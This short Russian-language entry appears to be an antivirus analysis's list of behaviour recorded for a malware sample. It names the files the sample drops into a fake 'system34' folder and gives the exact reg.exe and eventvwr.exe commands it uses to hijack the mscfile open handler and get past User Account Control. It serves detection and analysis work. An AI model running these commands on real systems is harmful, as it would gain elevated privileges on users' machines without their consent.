Техническая информация
- [<HKCU>\SOFTWARE\Classes\mscfile\shell\open\command] '' = 'cmd.exe /c start %WINDIR%\system34\Dank_Installer.exe'
- %WINDIR%\system34\bg.bmp
- %WINDIR%\system34\dank.exe
- %WINDIR%\system34\dank_installer.exe
- %WINDIR%\system34\dank.bat
- %WINDIR%\system34\installer.bat
- '%WINDIR%\system34\dank_installer.exe'
- '%WINDIR%\syswow64\cmd.exe' /c start %WINDIR%\system34\Dank_Installer.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\system34\installer.bat" "
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\SOFTWARE\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c start %WINDIR%\system34\Dank_Installer.exe" /f
- '%WINDIR%\syswow64\timeout.exe' /t 2
- '%WINDIR%\syswow64\eventvwr.exe'
- '%WINDIR%\syswow64\cmd.exe' /c start %WINDIR%\system34\Dank_Installer.exe
- '%WINDIR%\syswow64\reg.exe' DELETE HKCU\SOFTWARE\Classes\mscfile\shell\open\command /f